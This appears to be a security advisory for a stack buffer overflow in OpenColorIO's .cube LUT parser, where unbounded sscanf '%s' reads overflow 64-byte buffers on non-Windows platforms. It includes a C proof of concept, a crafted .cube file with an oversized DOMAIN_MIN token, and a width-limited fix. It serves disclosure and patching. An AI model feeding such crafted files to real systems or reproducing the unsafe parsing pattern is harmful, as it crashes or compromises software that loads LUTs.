Summary
FileFormatIridasCube.cpp uses sscanf with %s into 64-byte stack buffers without width limits when parsing DOMAIN_MIN and DOMAIN_MAX lines. On non-Windows platforms, a crafted .cube file overflows these buffers. The input comes from std::string with no length cap.
Details
Lines 244-246 (non-Windows path):
char domainMinR[64] = "";
char domainMinG[64] = "";
char domainMinB[64] = "";
if (sscanf(line.c_str(), "domain_min %s %s %s %c", domainMinR, domainMinG, domainMinB, &endTok) != 3)
Same pattern at lines 278-280 for DOMAIN_MAX. line is a std::string read from the file with no length limit. A token longer than 63 bytes overflows the stack buffer.
The Windows path uses sscanf_s with size parameters and is not affected.
PoC
#include <stdio.h>
#include <string.h>

int main(void) {
    /* Same buffer sizes and format string as the non-Windows parser path. */
    char domainMinR[64] = "";
    char domainMinG[64] = "";
    char domainMinB[64] = "";
    char endTok;
    char line[4096];
    /* First token is 208 bytes, well past the 63 bytes a 64-byte buffer can hold. */
    snprintf(line, sizeof(line), "domain_min %s 0.0 0.0",
             "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
             "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
             "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
             "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
    sscanf(line, "domain_min %s %s %s %c", domainMinR, domainMinG, domainMinB, &endTok);
    return 0;
}
// gcc -fsanitize=address -g -o poc poc.c && ./poc
// Expected: stack-buffer-overflow WRITE into domainMinR[64]
Crafted .cube file:
TITLE "crash"
DOMAIN_MIN AAAA...200chars... 0.0 0.0
DOMAIN_MAX 1.0 1.0 1.0
LUT_3D_SIZE 2
0.0 0.0 0.0
0.0 0.0 1.0
0.0 1.0 0.0
0.0 1.0 1.0
1.0 0.0 0.0
1.0 0.0 1.0
1.0 1.0 0.0
1.0 1.0 1.0
Impact
Stack buffer overflow when parsing a crafted .cube file on non-Windows. Attacker-controlled data on the stack. Reachable through any OCIO API or tool that loads .cube LUTs.
Suggested fix
if (sscanf(line.c_str(), "domain_min %63s %63s %63s %c", domainMinR, domainMinG, domainMinB, &endTok) != 3)
Same for DOMAIN_MAX block.